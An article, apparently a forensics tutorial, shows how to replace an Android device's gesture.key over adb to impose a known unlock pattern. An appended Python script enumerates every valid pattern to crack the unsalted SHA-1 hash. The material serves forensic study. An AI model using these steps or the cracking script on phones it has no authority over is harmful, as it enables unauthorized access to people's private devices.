Introduction
Android is an open source operating system based on the Linux kernel, initially developed by Android Inc., which Google bought in 2005. Initially, Android was developed to support touch screen devices like smartphones. These devices support different types of screen locks, like swipe lock, PIN lock, pattern lock, gesture lock, facial lock, etc.
Swipe lock unlocks the screen when you swipe a defined area of the screen with your fingertips. PIN lock unlocks the screen when you enter the correct PIN. Pattern lock unlocks the screen when the user draws a pattern across the nine circles on the screen that matches the one already saved on the system. This article covers only the pattern locking system and does not cover the biometric locking systems available on phones.
Understanding Android Pattern Locks
Figure 1: Android Pattern lock with numbering
Figure 2: Pattern for 1478
The Catch
The catch to changing the pattern is to replace this file with a gesture.key file that holds a known pattern.
Prerequisite
- Debugging mode should be enabled.
- Android adb (Android Debug Bridge) tool.
- AVD (Android Virtual Device) Manager Tool.
- Device USB Cable
- Device whose password needs to be changed
Methodology
Step 1
Start an AVD (Android Virtual Device), and create a pattern in the AVD. Open a command prompt. Execute the following command to check whether the AVD has been connected to the debugger or not.
    adb devices
The output of the command should look as shown in Figure 3. If you see the name of your emulator on the screen, then your device is connected correctly.
Figure 3: Output of adb devices
Now pull the gesture.key file out of the AVD. This file is located in /data/system. To do this, execute the command below.
    adb pull /data/system/gesture.key gesture.key
The gesture.key file will be pulled to your current working directory. The syntax of the command is adb pull followed by the path on the device and then the local path. Here my current working directory is my home folder, so the gesture.key file is copied to my home directory on the local file system.
The output of the command is shown in Figure 4.
Figure 4: Pulling out gesture.key file
Now connect the other device, whose password is to be changed, and close the AVD. For my example I will be using the same AVD. So now my password in my AVD is 1478 according to the pattern cell numbers. Figure 5 illustrates the pattern.
Figure 5: Current pattern of the Device
Figure 6: The new pattern which is not stored in the AVD
Now, to change the password to a known pattern, we will push our known pattern file to the new device. The command for pushing a file into an Android system is shown below. This file has to be pushed into /data/system on the new device.
    adb push gesture.key /data/system/gesture.key
The gesture.key file will be pushed into Android's file system, replacing the previous file. Android now has a new gesture file that contains a known password, and when we use this pattern to unlock the screen, the screen will be unlocked. The syntax for pushing a file into an Android system is adb push followed by the local path and then the path on the device.
The output of the command is shown in Figure 7.
Figure 7: Pushing the known pattern file into the Android system
Figure 8: Pattern replaced with a known pattern
Limitations
- The device should be rooted
- The device should have USB debugging mode enabled
Reference
You can also take the SHA-1 hash value stored in the gesture key and match it against a database to find the pattern lock combination. You can use my Python script (https://github.com/c0d3sh3lf/Android_Forensics) to automate the decoding process.
You can download the dictionary file from http://www.android-forensics.com/tools/AndroidGestureSHA1.rar (25 MB)
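Why a dictionary lookup like the one described above works: the example below is added here and is not the author's script or the linked dictionary. It assumes the gesture.key format used by Android releases before 6.0, which the article does not spell out: an unsalted SHA-1 over one byte per cell, with cells numbered 0 to 8 row by row and at least four cells per pattern; the decode step converts back to the article's 1 to 9 numbering.

```python
import hashlib

def _mid(a, b):
    """Cell lying exactly between a and b (cells 0..8, row-major), or None."""
    ra, ca, rb, cb = a // 3, a % 3, b // 3, b % 3
    if a != b and (ra + rb) % 2 == 0 and (ca + cb) % 2 == 0:
        return (ra + rb) // 2 * 3 + (ca + cb) // 2
    return None

def valid_patterns(min_len=4, max_len=9):
    """Yield every pattern the lock screen accepts, as a tuple of cells 0..8."""
    def extend(path, used):
        if len(path) >= min_len:
            yield tuple(path)
        if len(path) == max_len:
            return
        for nxt in range(9):
            mid = _mid(path[-1], nxt)
            # No cell reuse, and no jumping over a cell that is still unused.
            if nxt in used or (mid is not None and mid not in used):
                continue
            yield from extend(path + [nxt], used | {nxt})
    for start in range(9):
        yield from extend([start], {start})

def gesture_hash(pattern):
    """Assumed gesture.key content: unsalted SHA-1 over one byte per cell."""
    return hashlib.sha1(bytes(pattern)).digest()

def build_table():
    """Digest -> pattern for the whole keyspace (389,112 entries)."""
    return {gesture_hash(p): p for p in valid_patterns()}

def decode(key_bytes, table):
    """Return the pattern in the article's 1-9 numbering, or None if unknown."""
    pattern = table.get(key_bytes)
    return None if pattern is None else "".join(str(c + 1) for c in pattern)

if __name__ == "__main__":
    table = build_table()
    # Constructed sample: the 20 bytes a gesture.key would hold for pattern 1478.
    sample = gesture_hash((0, 3, 6, 7))
    print(len(table), "patterns;", sample.hex(), "->", decode(sample, table))
```

With no salt and a keyspace this small, the stored hash is equivalent to the pattern itself, so the file is only as safe as the root and USB debugging restrictions listed under Limitations.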
 
    
 
 
 
 